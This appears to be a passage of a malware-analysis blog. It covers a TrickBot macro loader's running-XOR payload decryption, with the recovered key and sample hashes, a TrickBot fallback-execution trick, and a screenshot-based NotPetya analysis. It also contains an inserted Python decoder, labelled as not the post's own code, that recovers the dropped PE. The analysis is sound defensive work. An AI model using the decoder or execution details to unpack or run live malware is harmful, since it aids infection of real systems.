<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8hNe8UTmLXjB7r5HPY6lzC_kExEwD2iRgwhv4DQ7P2Yj9r6JMk9WB8eYwBtuZSLg7B6JSqiq2rkbeS-HIrWji6RBmNhMr2CInFnGjHyuTvqrW-DG6jgCL5kPpvl95OMxrMArH8nuwRoW/s1600/53.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="433" data-original-width="1475" height="186" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjm8hNe8UTmLXjB7r5HPY6lzC_kExEwD2iRgwhv4DQ7P2Yj9r6JMk9WB8eYwBtuZSLg7B6JSqiq2rkbeS-HIrWji6RBmNhMr2CInFnGjHyuTvqrW-DG6jgCL5kPpvl95OMxrMArH8nuwRoW/s640/53.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxa-ehFJXSL6EWthYyJf0aUXxj0JC571XwFn_kRjX13bxTyAqRdEjbhm45zEfbfHM3e5Q2iKHX7Sk2uOmfbZaQe6h_vVt_bdhdPiYcoRBTFY_ZlCl38KjMvhYlXZ18w8O76NhMdTH9gmG-/s1600/54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="267" data-original-width="1459" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxa-ehFJXSL6EWthYyJf0aUXxj0JC571XwFn_kRjX13bxTyAqRdEjbhm45zEfbfHM3e5Q2iKHX7Sk2uOmfbZaQe6h_vVt_bdhdPiYcoRBTFY_ZlCl38KjMvhYlXZ18w8O76NhMdTH9gmG-/s640/54.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgElu6M5ellcTl5oe7PeL9I7L3GP5kepupZRxoKwiLwn2OQplW29Gpj_1Nv1GzbOTeItnBOMcRc4a9yAbi_u-tog4woI1YNwO0mLV3lKgTHrkjHqgHUFivio7Japp_-Oqi_Y_gamoF-FJsQ/s1600/55.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="93" data-original-width="975" height="60" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgElu6M5ellcTl5oe7PeL9I7L3GP5kepupZRxoKwiLwn2OQplW29Gpj_1Nv1GzbOTeItnBOMcRc4a9yAbi_u-tog4woI1YNwO0mLV3lKgTHrkjHqgHUFivio7Japp_-Oqi_Y_gamoF-FJsQ/s640/55.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3L5swNgUaCVs3tTD3nDIjO5ADZShOcLp_tHj91Qm_1gozbcrXW__mGX4b-RAle7uu4Wgs3EJbDMdJB7aSQIk2R1e9iPUvnm_VT-wqhezFSgwE_51i2OvSuDLJE0P2YkF7803wkQF6oEw/s1600/56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="47" data-original-width="513" height="29" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG3L5swNgUaCVs3tTD3nDIjO5ADZShOcLp_tHj91Qm_1gozbcrXW__mGX4b-RAle7uu4Wgs3EJbDMdJB7aSQIk2R1e9iPUvnm_VT-wqhezFSgwE_51i2OvSuDLJE0P2YkF7803wkQF6oEw/s320/56.png" width="320" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDAX3YjY8I9xWE599_xYzmpvdW0mQ-rZeCYiQe4fC_najsZ_pWl2QjBdaaZ6_FGC6dCTRG_HCsP7WKuH59U3Ga-uLYrpMsjd3JzuFMfH72fZZXML03qBZ0zfyKIl4Q0p5YxRtoS93Jxn1l/s1600/59.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="771" data-original-width="1353" height="227" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDAX3YjY8I9xWE599_xYzmpvdW0mQ-rZeCYiQe4fC_najsZ_pWl2QjBdaaZ6_FGC6dCTRG_HCsP7WKuH59U3Ga-uLYrpMsjd3JzuFMfH72fZZXML03qBZ0zfyKIl4Q0p5YxRtoS93Jxn1l/s400/59.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwlG9Utsrzk6la1oioTAelytUfW9Ru-3d75JamOzBraun582kiW3lc_psrvulqPmODCspw7OTOgp8FboIygniseWwx-K7OUzmCpMyAMTCQBt9ofXdhoRfx_c6bJlrj1_5mL4LR12cM5cn/s1600/60.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1065" height="104" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimwlG9Utsrzk6la1oioTAelytUfW9Ru-3d75JamOzBraun582kiW3lc_psrvulqPmODCspw7OTOgp8FboIygniseWwx-K7OUzmCpMyAMTCQBt9ofXdhoRfx_c6bJlrj1_5mL4LR12cM5cn/s320/60.png" width="320" /></a></div>
<br />
<div style="margin-left: 1em; margin-right: 1em; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-5qeNF-23Jofp5BCPn-Nx_G-_PeilmmIAFSkFP50815TgZ-7ATAqsqylBrm-vUqRVKh1XRvhkoUW77YNnKqHgMAjMbZtSkskHUsmh_xJ5Ktydtjn9p7ZxBIt-8M02l_lXwiIQ4vib1-ir/s1600/61.png" imageanchor="1" style="font-size: 11pt; margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="227" data-original-width="737" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-5qeNF-23Jofp5BCPn-Nx_G-_PeilmmIAFSkFP50815TgZ-7ATAqsqylBrm-vUqRVKh1XRvhkoUW77YNnKqHgMAjMbZtSkskHUsmh_xJ5Ktydtjn9p7ZxBIt-8M02l_lXwiIQ4vib1-ir/s320/61.png" width="320" /></a></div>
<br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
ltwo :
"<span style="background: lime; mso-highlight: lime;">zueVXBTjygBR8akj5duCwSYO1jxEfnjh</span>"
: String : Module3.PuWord</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
This is the KEY that will be used to decrypt the payload (running XOR)</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;">vbFromUnicode
: 128 : Long : Module3.PuWord</span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGDM5-_PQ-GmTi7gheNnX7Ur5uMXFbOlYyOsIWeU4TRT0r3cDTfIv7oqnI30R7yR2rmITVZOY0thWjTp2N50zCk7qjYiGEAmmIQKL0IGqcsC60_u6Doo_YESwafxASBrEzUnRSoij_DXST/s1600/62.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="332" data-original-width="825" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGDM5-_PQ-GmTi7gheNnX7Ur5uMXFbOlYyOsIWeU4TRT0r3cDTfIv7oqnI30R7yR2rmITVZOY0thWjTp2N50zCk7qjYiGEAmmIQKL0IGqcsC60_u6Doo_YESwafxASBrEzUnRSoij_DXST/s320/62.png" width="320" /></a></div>
<div class="" style="clear: both; text-align: center;">
<div style="text-align: left;">
Loop starts (running XOR):</div>
</div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyRfaow9aUGj7L4Diudr7pXUkV6SwiRHQw2xIs-r267xwC0cbcrZAWHUUGncsUHMm-ig_22BfraKD9DI8GAtAF4ZfJqU3H4sLv0CzBUpgenx7qxqt9-YDqUktpjK9ZLzPXqJa8hxJvIRv_/s1600/63.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="387" data-original-width="903" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyRfaow9aUGj7L4Diudr7pXUkV6SwiRHQw2xIs-r267xwC0cbcrZAWHUUGncsUHMm-ig_22BfraKD9DI8GAtAF4ZfJqU3H4sLv0CzBUpgenx7qxqt9-YDqUktpjK9ZLzPXqJa8hxJvIRv_/s320/63.png" width="320" /></a></div>
<br />
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
The loop terminates when the file is completely decrypted (end of file). At this point the decrypted payload is dumped on the filesystem > </div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTFRVgHBnuxaG6IPmL48cpwVVD9097SkouPPaMyHVbW7Eo6DhxSByw_uioXCO4denl-b0x0xqMkmBhJ2GsJG-f0RN5pqUkyvGaT0C9cLtdfBwXTYuysukUF8kPNFKVc26yRObiya1WS6L0/s1600/64.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="71" data-original-width="1021" height="44" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgTFRVgHBnuxaG6IPmL48cpwVVD9097SkouPPaMyHVbW7Eo6DhxSByw_uioXCO4denl-b0x0xqMkmBhJ2GsJG-f0RN5pqUkyvGaT0C9cLtdfBwXTYuysukUF8kPNFKVc26yRObiya1WS6L0/s640/64.png" width="640" /></a></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<span style="font-size: 11pt;"><br /></span></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
This is the actual malware - TrickBot in this case. </div>
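<div class="" style="clear: both; text-align: left;">
The decryption loop described above, reproduced as an added Python example (this is not the macro's own code and is not taken from the post): it assumes the "running XOR" cycles the ASCII key bytes over the whole file (byte i is XORed with key[i mod len(key)]), mirrors the Open / LOF / Get / Put sequence from the bullet list, and checks the result for an MZ/PE header so a wrong key or a wrong XOR mode is caught instead of silently producing garbage. The key is the one recovered from Module3.PuWord; the fake PE image and the file paths are constructed for the demo.</div>

```python
"""Repeating-key XOR decoder for a loader's dropped payload (added example, not the macro's code)."""
import sys

# Key recovered in the post (watch window: ltwo : "..." : String : Module3.PuWord).
# vbFromUnicode (128) in the macro means the key is used as its ANSI byte string,
# which is what a Python bytes literal gives us here.
KEY = b"zueVXBTjygBR8akj5duCwSYO1jxEfnjh"


def xor_running(data: bytes, key: bytes) -> bytes:
    """XOR every byte with the key, cycling the key over the buffer.

    ASSUMPTION (not stated on the page): the loop uses key[i mod len(key)].
    XOR is its own inverse, so the same call encrypts and decrypts.
    """
    if not key:
        raise ValueError("empty key")
    key_len = len(key)
    return bytes(b ^ key[i % key_len] for i, b in enumerate(data))


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check for a decrypted payload: MZ stub and 'PE\\0\\0' at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_payload(encrypted: bytes, key: bytes = KEY) -> tuple:
    """Decrypt a buffer and report whether the result is a plausible PE."""
    plain = xor_running(encrypted, key)
    return plain, looks_like_pe(plain)


def decrypt_file(src_path: str, dst_path: str, key: bytes = KEY) -> bool:
    """File-level equivalent of the macro's Open/LOF/Get -> XOR -> Put sequence."""
    with open(src_path, "rb") as f:          # Open ... For Binary
        data = f.read()                      # Get bbb, 0 To LOF (whole file)
    plain, ok = recover_payload(data, key)
    with open(dst_path, "wb") as f:          # Put the decrypted bytes to disk
        f.write(plain)
    return ok


def make_fake_pe() -> bytes:
    """Constructed stand-in for the real payload: MZ header, e_lfanew = 0x40, PE signature."""
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little"))
    hdr += b"PE\0\0" + b"\0" * 20
    return bytes(hdr)


if __name__ == "__main__":
    if len(sys.argv) == 3:
        # Usage: python xor_payload.py <encrypted blob> <output file>
        print("PE header found:", decrypt_file(sys.argv[1], sys.argv[2]))
    else:
        # Self-check on a constructed sample: encrypt, decrypt, verify.
        sample = make_fake_pe()
        blob = xor_running(sample, KEY)
        plain, ok = recover_payload(blob)
        print("round-trip ok:", plain == sample, "PE header found:", ok)
```

<div class="" style="clear: both; text-align: left;">
If the PE check fails with the recovered key, the assumption about the loop is what to revisit first: some macro loaders advance the key by the previous ciphertext or plaintext byte rather than simply cycling it, and the decoder above would then have to be changed to match the disassembled loop.</div>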
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
Enjoy and share!</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br />
<br />
Sample details:<br />
MD4: b71b9f3126883b6a9faa1713e3dc3339<br />
MD5: 7e0237a65a357899116d334df3de4831<br />
SHA-1: 3553f5de61c222f271546087018cc32bcafd6d5e<br />
<div>
<br /></div>
</div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
<div lang="en-AU" style="font-family: Calibri; font-size: 11.0pt; margin: 0in;">
<br /></div>
</div>
</div>
<b>TrickBot Banking Malware - some features of interest</b> (2017-07-20)<div dir="ltr" style="text-align: left;" trbidi="on">
Here's one:<br />
<br />
It creates this dir - c:\Users\%username%\appdata\Roaming\winapp\<br />
<br />
Now - if you're thinking that creating this dir yourself and then read/write protecting it will make this malware not execute fully, you're wrong :)<br />
<br />
If it can't access that location to create the directory, it simply dumps the PE on the Desktop and executes from there.<br />
<br />
Cool stuff!</div>
<b>TrickBot Banking Trojan Configuration Files July 2017</b> (2017-07-06)<div dir="ltr" style="text-align: left;" trbidi="on">
Posted the config files on my github - <a href="https://github.com/vithakur/TrickBot-Config-Files" target="_blank">https://github.com/vithakur/TrickBot-Config-Files</a></div>
<b>Petya NotPetya Quick and Dirty Analysis</b> (2017-06-28)<div dir="ltr" style="text-align: left;" trbidi="on">
I'll leave the detailed version to hasherezade :)<br />
This is a quick look at what the malware is about and what functions it uses.<br />
<br />
Looks for physical drives on the infected computer.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2I0r0TR7rfmSBEkAc6ZKjc1Fx5fARDRuWL8HtUOhv9zHziNYWbdIJXjCIZlQ3InjlrbYmzzi1phEZEgQaZDzqDoMqVkf9c46g6eZZ51u4h4ij0K9THvP40dUPwYKSehl5G7C2nPc2bFZA/s1600/1-physical+drive.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="1005" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2I0r0TR7rfmSBEkAc6ZKjc1Fx5fARDRuWL8HtUOhv9zHziNYWbdIJXjCIZlQ3InjlrbYmzzi1phEZEgQaZDzqDoMqVkf9c46g6eZZ51u4h4ij0K9THvP40dUPwYKSehl5G7C2nPc2bFZA/s400/1-physical+drive.PNG" width="400" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
Here's the bundled-in psexec, as dllhost.dat:</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s1600/8-hidden-exe.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1101" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s400/8-hidden-exe.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Here's another PE, which appears to be launched through rundll32.exe as perfc.dat:</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s1600/8-hidden-exe.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="347" data-original-width="1101" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8mTo3VMDYxnyU5r8QiY7YVETci6FIRrDHWmZWXTinaWX8DoutMBJJrcQC-PbD0c6PWyiWl7rC77RuqjcyN-FwtBcYW1T4eQ93MGt62AYc0wu58tS7Xd_Mjf1Uid0tnu-7A_6-4gESyKyw/s400/8-hidden-exe.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Infection starts.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfPVUZWRKSUVjigQFWQRvluqL5OVKgjbOlgI7ydOvztVyg7LSAPsWSrZYANKaODfggsNjTbDrXc_6ceAFtiaw4UgBITVzfpS9gCvSE3EukAiS7lE6pywI59ePffFRebh6ehvShrorLCQC/s1600/dllhost-psexec-execution2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="563" data-original-width="1433" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgfPVUZWRKSUVjigQFWQRvluqL5OVKgjbOlgI7ydOvztVyg7LSAPsWSrZYANKaODfggsNjTbDrXc_6ceAFtiaw4UgBITVzfpS9gCvSE3EukAiS7lE6pywI59ePffFRebh6ehvShrorLCQC/s400/dllhost-psexec-execution2.PNG" width="400" /> </a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoA3KfkDwNFfpeO8nXeSEAT7Nl7bzxATNa5nIcfWNeB4L3O0fwgw1JORlF2v4JT5Nhg2Xr4YrapCQt8Vd3_9icx2s1uU2zqu0MgBnV12XXznB2BU4JOarY2WrIM9JEchKq0LQ7pvJpD4Wp/s1600/dllhost-psexec-execution.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="1233" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoA3KfkDwNFfpeO8nXeSEAT7Nl7bzxATNa5nIcfWNeB4L3O0fwgw1JORlF2v4JT5Nhg2Xr4YrapCQt8Vd3_9icx2s1uU2zqu0MgBnV12XXznB2BU4JOarY2WrIM9JEchKq0LQ7pvJpD4Wp/s400/dllhost-psexec-execution.PNG" width="400" /></a></div>
<br />
dllhost.dat > PsExec<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBDxgjH4VTHejqWl_GcQYyE9PQYwDez9pfJmaK9XDm1q7IiFyRblOspUHKaglS7UkTs5xgScrggAkJA8S-2XYnLlLCHama5ZfVhhyphenhyphen-T8R7qWpYlWi0GW6M8IvkRz9GvgHuG9iL9OzvUICI/s1600/dllhost-psexec.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="335" data-original-width="1435" height="74" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBDxgjH4VTHejqWl_GcQYyE9PQYwDez9pfJmaK9XDm1q7IiFyRblOspUHKaglS7UkTs5xgScrggAkJA8S-2XYnLlLCHama5ZfVhhyphenhyphen-T8R7qWpYlWi0GW6M8IvkRz9GvgHuG9iL9OzvUICI/s320/dllhost-psexec.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoYe-y1Spg57V6IpyOR0YxaW_QfN_23WyyzOG9KgUraU5Ekg7KT43KTxTSGb0XKONF07fijtXXNSvBNmiIKhxamIjStxCqUw_wWUSK9XRxSnvcOMZARL-ZXN9QYo9YiLpQeFL4GjdS9Hh/s1600/dllhost-psexec2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="167" data-original-width="795" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqoYe-y1Spg57V6IpyOR0YxaW_QfN_23WyyzOG9KgUraU5Ekg7KT43KTxTSGb0XKONF07fijtXXNSvBNmiIKhxamIjStxCqUw_wWUSK9XRxSnvcOMZARL-ZXN9QYo9YiLpQeFL4GjdS9Hh/s400/dllhost-psexec2.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWytL7I-so_kEeSl2AxJJMbcOgtfaXUcwsJz9FtCnWzlzIAWln3lQLqXNj3avkomwz0I5vWB_nV3UemPYwnrWksE5Ni8eJZeeXYkdQTD7k4W51nHh_NTF7PSrpCZ_velyARYd2RisAnTSH/s1600/dllhost-psexec-chart.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="759" data-original-width="633" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWytL7I-so_kEeSl2AxJJMbcOgtfaXUcwsJz9FtCnWzlzIAWln3lQLqXNj3avkomwz0I5vWB_nV3UemPYwnrWksE5Ni8eJZeeXYkdQTD7k4W51nHh_NTF7PSrpCZ_velyARYd2RisAnTSH/s400/dllhost-psexec-chart.PNG" width="332" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
System restart.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhukdvc1f9ai0leleSPhWM4L0wVWx5wqDCJrByGNVuIQLWmXiR2xEkXvwlhw4kqP-QLADjjnXQfkiOu_e2ywjcXVMvq9WmphDiToGIbTL-bs2bDEfzRhQPu_plNwKclbA8Zg8drZEGNawZJ/s1600/shu.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="631" data-original-width="1429" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhukdvc1f9ai0leleSPhWM4L0wVWx5wqDCJrByGNVuIQLWmXiR2xEkXvwlhw4kqP-QLADjjnXQfkiOu_e2ywjcXVMvq9WmphDiToGIbTL-bs2bDEfzRhQPu_plNwKclbA8Zg8drZEGNawZJ/s400/shu.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Encryption.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJh3FaCg0nCodWgsDd9sopVnD4TYzGtzw-Q1uHhiRkeqQVayI5olSw2yufvnuRIAHd-n4ufLk0Y_rI7oER6vLwoCmcUiSQgPDmj-JhrJNydOnC21XOoBbJTEdv6c8q8ONXjO0ttR55OT3/s1600/2-crypt-aqcuire-context.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="441" data-original-width="1091" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimJh3FaCg0nCodWgsDd9sopVnD4TYzGtzw-Q1uHhiRkeqQVayI5olSw2yufvnuRIAHd-n4ufLk0Y_rI7oER6vLwoCmcUiSQgPDmj-JhrJNydOnC21XOoBbJTEdv6c8q8ONXjO0ttR55OT3/s400/2-crypt-aqcuire-context.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpPOpDcjwDSphkLSZcQjzJ0X-G2LmNKhx2Ud3YUIWemYLy-zcjkzDpim18MLwsX7ndvC4XNk0_xFkNLjUCnAp3XwkzPXuYTymeJiqjdcqUn0B_fPmwuTRjoRXToGIW0U_lBRiL8GX5dfHg/s1600/3-crypt-random.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="409" data-original-width="995" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpPOpDcjwDSphkLSZcQjzJ0X-G2LmNKhx2Ud3YUIWemYLy-zcjkzDpim18MLwsX7ndvC4XNk0_xFkNLjUCnAp3XwkzPXuYTymeJiqjdcqUn0B_fPmwuTRjoRXToGIW0U_lBRiL8GX5dfHg/s400/3-crypt-random.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLriXQJOYFNuOVQDr7_Xy4ZTTzrAXKvQxm_YW45nlMkRhHxdtNhby4SPkfkwebz0VTXJnOMXE5CU4HlPOpprYbHWUVVd3lsN9TnQqiRLKN65ko_7Tuimqi0Lo6fORGNvOtot2ow2PZHcPB/s1600/4-crypt-release.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="457" data-original-width="1287" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLriXQJOYFNuOVQDr7_Xy4ZTTzrAXKvQxm_YW45nlMkRhHxdtNhby4SPkfkwebz0VTXJnOMXE5CU4HlPOpprYbHWUVVd3lsN9TnQqiRLKN65ko_7Tuimqi0Lo6fORGNvOtot2ow2PZHcPB/s400/4-crypt-release.PNG" width="400" /></a></div>
<br />
Provider: MS RSA AES<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O8IFo9VSQQEKv0wPyqI3vr2ONwB359fIqznM9xxGwrqd1WTdtKAzOjxDLmI-8HXXhmwJWeke3m1On_eExjitmvbeNGIrLU9ZklXCbmGR9AOUUblVPQU1RdrPuOEObSTGzZM6MDadMWAW/s1600/crypt-provider.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="187" data-original-width="1395" height="52" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0O8IFo9VSQQEKv0wPyqI3vr2ONwB359fIqznM9xxGwrqd1WTdtKAzOjxDLmI-8HXXhmwJWeke3m1On_eExjitmvbeNGIrLU9ZklXCbmGR9AOUUblVPQU1RdrPuOEObSTGzZM6MDadMWAW/s400/crypt-provider.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This is where it starts in user-land.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_p3UssW7vW1gqcxIwzZ5PHXE2kkBLv-AmRd1Ahans6Pe_UAkQ4jILvHlU2lrc6Jg6neVJK6oW0qOE-fNsyTrvCkmP03HHp84_1g3cgF-gto0ENP5BmcuVeIsx6ncWt9w5fbj8p5Kp2Lg/s1600/reapairing.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="475" data-original-width="1475" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY_p3UssW7vW1gqcxIwzZ5PHXE2kkBLv-AmRd1Ahans6Pe_UAkQ4jILvHlU2lrc6Jg6neVJK6oW0qOE-fNsyTrvCkmP03HHp84_1g3cgF-gto0ENP5BmcuVeIsx6ncWt9w5fbj8p5Kp2Lg/s400/reapairing.PNG" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
